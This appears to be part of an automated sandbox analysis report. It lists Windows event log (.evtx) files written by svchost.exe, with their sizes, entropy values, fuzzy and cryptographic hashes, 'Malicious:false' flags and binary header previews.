                                                                                                  SHA1:45191A1CF33687DE8D75C19CFE47036C2039F74D
                                                                                                  SHA-256:9079D323B649BDB79F5EE2D84A150BCCCA8189E5598DA64AD477A64D7E194D9C
                                                                                                  SHA-512:9D37A9B68FEA82B48D80B8FA2431130D0F311C93FA160241164B90AB602FC073C1026FD045C1BA29246B6FC5E9DDF1C111329B0E19E9A5EC7A2731059C0F6360
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.................O.......b............O..XQ...........................................................................LM ................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..h...]........3..............&...............................................................8.......P.....!..................3......&O....].'O............]....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l.;...@\.K.f<...ZM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l./.O.p.e.r.a.t.i.o.n.a.l......L..........P.a.th...**..h...^........TQ..............&...............................................................8.......P.....!...............

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.742967935720958
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:ZkN2cTOsKbwj1/q4ogZCAJTi07NrjzDbRt:rcisAwjFogZCAJTi053R
                                                                                                  MD5:24FCFC592981BB43F5ADE09D83B4FA0C
                                                                                                  SHA1:5BFCE8052918DF521DB459330B24C0E593CB0B0E
                                                                                                  SHA-256:51E184535B72335572901288DFC15C1FFE746BF32A7D5E46A8964FE32383010F
                                                                                                  SHA-512:1987343E4046F63EB02EAF7FE830CDED59847C4B7967BCFD0BCC26CF85CEF123AD6FB620C82B1CD9B09FDADE0FE1D62F2588385703C7E25424067A17C6CDB5D5
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........................................p......y......................................................................C:................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.7590316238843728
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                                                                                  MD5:B074238315662886E2BD70106D08A747
                                                                                                  SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                                                                                  SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                                                                                  SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.7510752026907066
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:FXhVUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:FXbnS
                                                                                                  MD5:40D45DD21098C7D103456448E14AD36E
                                                                                                  SHA1:966A0F6F4CFC8078D1CD085EBC37BC3E70F9CE39
                                                                                                  SHA-256:6BA39207AC02FD1DDB18A9463F63CF11B2C6A7977F29E934B124393FB700613D
                                                                                                  SHA-512:F3EC1381AF73CA76FF605BE0B4F65C6CAD648FF3B5AA1D58831EB83A7A443E504DB5E30081CC21C7FD8939598DEB5D761CA8C895A94897F01B5B4E08C0325054
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........%...............%............E..`G..d..........................................................................................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.3069197485541766
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                                                                                  MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                                                                                  SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                                                                                  SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                                                                                  SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2680
                                                                                                  Entropy (8bit):3.8633382242665317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:M1pW8PCKOrCK3QbB69DOvExCKOrCK3Qbkcqr+XCKOrCK3Qbkcqra:uPCKOrCKgl69DOgCKOrCKgbkcG+XCKOu
                                                                                                  MD5:4C72ABD8033D0B8F3A5D43D863FAFE28
                                                                                                  SHA1:8E61E09D93021CC79098F9C6B0674DA535C9E465
                                                                                                  SHA-256:9DC248C60CA18065CEC16F718EDE6FBA24EFE4512C4E3CB6E98B361EBD39F45B
                                                                                                  SHA-512:4B7231773777092E422837B6589E1B2D9421F27AD46700C71F0C6A9443B87A3F8479511D0436E879219D946FCEBE9132E7D4579E4A6DD7E3AD67CDC9B9F65D28
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........&...............&...........0...0....?........................................................................K.................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**......$.......R.9..............................................................................L.......b.....!.................R.9......&O......'O........D...$....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^'...........h.......>...................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.2909571978750325
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                                                                                  MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                                                                                  SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                                                                                  SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                                                                                  SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.488768580471203
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                                                                                  MD5:E3FB1708C64D250E4D801AFB8688DF35
                                                                                                  SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                                                                                  SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                                                                                  SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.499689077478035
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:ncRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20GW:ncRFkL1TWX0gkB/J7oasEfyk2/vKlqk+
                                                                                                  MD5:6D78A47EA17EB775B015A42F5059812E
                                                                                                  SHA1:554190047392263D9A03980875A02DBB49F4A7AA
                                                                                                  SHA-256:7998186361DE73867435ABC1264ACB847A4699FDCC4E6F99A3BA4104E7F3F28D
                                                                                                  SHA-512:3E2A1336B788FFD59C5077B459917ED26C75DAF4A94B8E23F6536903770F3DE5106EA17FDFA2F8D56C9F41FA2590DB90865F0A1C90CC75218C6ED219B5FD0643
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.>...............>............................a.......................................................................R'.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.495003969157729
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:mhN7s7o787l7r787a7J7z7+7N17g777+7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:m9juCg
                                                                                                  MD5:ACC76E29B3F225492060FB5F4D82EE21
                                                                                                  SHA1:7CA303EA5E3B87FF6A28C67771BE2D7D851A7688
                                                                                                  SHA-256:343B61CFAE4F555D90DB2F0D32A80AFEFEE31F61A1E93BEDCA02A1B5C542B793
                                                                                                  SHA-512:0607ADD00EED3FEBB41C8FB385595D41FF431DC9141C415274A87CEE9D9C51BC393E598EED579EF5A5E861B1AEDB59CDBDFAF8DFD4365ECAAC994146644F384B
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.Y.......g.......Y.......g............%...&........................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.1499045494600955
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                                                                                  MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                                                                                  SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                                                                                  SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                                                                                  SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.8164696340947971
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                                                                                  MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                                                                                  SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                                                                                  SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                                                                                  SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.9855903635327656
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                                                                                                  MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                                                                                  SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                                                                                  SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                                                                                  SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.165454452307923
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                                                                                  MD5:B6B6F199DA64422984403D7374F32528
                                                                                                  SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                                                                                  SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                                                                                  SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.8519554794255333
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                                                                                  MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                                                                                  SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                                                                                  SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                                                                                  SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.1642919553794224
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                                                                                  MD5:D7EECF043241FDB9486580582E208603
                                                                                                  SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                                                                                  SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                                                                                  SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70264
                                                                                                  Entropy (8bit):4.574132704825596
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:KTEGIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbR:K4Z+Jao7mce8pt
                                                                                                  MD5:C549E7A49DD022CA2DE027214097D53E
                                                                                                  SHA1:A00B25B3076452C779DA1B0BB146DC59B3240414
                                                                                                  SHA-256:EA6172C80714D08136A5A1A1A58CE91D398C6262A7322D3D12797447527F25F3
                                                                                                  SHA-512:9761843BB4FEBAAA560260E72D85321AF1AABCE8680A8A00292D87DE0C2AE9A1FF6E2C1AB34A81553103B0A63725534F55E81325FEE81D417FB94CC76C4DAC58
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........................................."...T......................................................................e..;........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**.............._...............&.......................................................................F.....!...A.A..........._.......&O......'O.................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......................I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.1791080805927432
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:8hL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUm4WUm:8Y7Ll
                                                                                                  MD5:A98A41F0A03756B408C161F1E5D63831
                                                                                                  SHA1:1971B19A7ACEF98A1BE782F330DF046690D25DB3
                                                                                                  SHA-256:558A4C0276B59960C028F6CB214BB95895401619B9ADF7DF74C4EF311C81E973
                                                                                                  SHA-512:D781D218E5131116CB0CCCA7D844DB71F9D6ECB5DC27325FA3C5EABB4BDA9C345D286DBAD5F1E9D820DA7BD31B613E950197F684D9B197D06CC002DE5FFF226A
                                                                                                  Malicious:false
